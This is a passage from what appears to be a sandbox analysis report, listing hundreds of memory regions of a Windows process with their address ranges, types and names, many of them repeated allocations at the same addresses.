monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6693 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 6704 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6705 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6706 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6707 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6708 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6709 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6710 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6711 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6712 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6713 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6714 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6715 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6716 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6717 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6718 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6719 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6727 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6728 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6729 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6730 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6732 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6733 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 6734 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6735 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6736 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6737 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6738 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6739 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6740 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6741 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6742 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6743 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6744 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6745 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6746 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6747 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6748 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6749 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6750 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6751 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6752 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6753 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6754 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6755 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6756 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6757 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6758 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6759 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6760 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6761 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6762 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6763 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6764 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6765 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6766 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6767 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6768 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6769 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6770 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6771 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6772 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6773 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6774 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6775 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6776 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6777 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6778 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6779 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6780 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6781 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6782 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6783 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6784 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6785 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6786 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6787 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6788 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6789 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6790 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6791 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6792 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6793 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6794 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6795 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6796 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6797 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6798 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6799 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6800 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6801 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6802 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6803 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6804 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6805 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6806 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6807 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6808 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6809 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6810 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6811 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6812 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6813 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6814 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6815 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6816 start_va = 0x101d0000 end_va = 0x106c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000101d0000" filename = "" Region: id = 6817 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6818 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6819 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6820 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6821 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6822 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6823 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6824 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6825 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6826 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6827 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6828 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6829 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6830 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6831 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6832 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6833 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6834 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6835 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6836 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6837 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6838 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6839 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6840 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6841 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6842 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6843 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6844 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6845 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6846 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6847 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6848 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6849 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6850 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6851 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6852 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6853 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6854 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6855 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6856 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6857 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6858 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6859 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6860 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6861 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6862 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6863 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6864 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6865 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6866 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6867 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6868 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6869 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6870 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6871 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6872 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6873 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6874 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6875 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6876 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6877 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6878 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6879 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6880 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6881 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6882 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6883 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6884 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6885 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6886 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6887 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6888 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6889 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6890 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6891 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6892 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6893 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6894 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6895 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6896 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6897 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6898 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6899 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6900 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6901 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6902 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6903 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6904 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6905 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6906 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6907 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6908 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 